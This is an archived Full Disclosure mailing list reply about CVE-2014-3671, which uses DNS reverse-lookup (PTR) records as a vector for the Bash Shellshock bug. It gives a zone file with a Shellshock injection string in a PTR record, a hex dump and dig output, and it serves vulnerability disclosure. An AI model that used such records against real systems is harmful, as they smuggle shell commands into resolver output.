Full Disclosure mailing list archives
Re: CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)
From: Dirk-Willem van Gulik <dirkx () webweaving org>
Date: Tue, 14 Oct 2014 15:45:34 +0100
On 14 Oct 2014, at 13:04, Florian Weimer <fw () deneb enyo de> wrote:
A simple zone file; such as: $TTL 10; $ORIGIN in-addr.arpa. @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org ( 666 ; serial 360 180 3600 1800 ; very short lifespan. ) IN NS 127.0.0.1 * PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS"I'm surprised DNS servers grok this, should be * IN PTR \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS. Or something similar.
The production versions of NSD accepts this fine ‘as is’ (FreeBSD-9.3); bind requires a bit of careful escaping. On te wire one then sees the raw ‘binary’ — which can indeed be very raw: 000001d0 XX XX XX XX 31 28 29 20 7b 20 3a 3b 7d 3b 20 65 () { :;}; e| 000001e0 63 68 6f 20 63 76 65 2d 32 30 31 34 2d 36 32 37 |cho cve-2014-627| 000001f0 31 2c 20 63 76 65 2d 32 30 31 34 30 37 31 36 39 |1, cve-201407169| 00000200 2c 20 72 64 6e 73 c0 14 c0 XX XX XX XX XX XX XX |, rdns And once you push this through DIG - one sees: 4.3.2.1.in-addr.arpa. 10 IN PTR \(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa. depending on your escaping (which nornal unix libc/resolve does). And then we found at least one setenv() which would *de-escape* above nicely - getting the octal and decimal right. Dw. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.) Dirk-Willem van Gulik (Oct 13)
- <Possible follow-ups>
- Re: CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.) Florian Weimer (Oct 14)
- Re: CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.) Dirk-Willem van Gulik (Oct 14)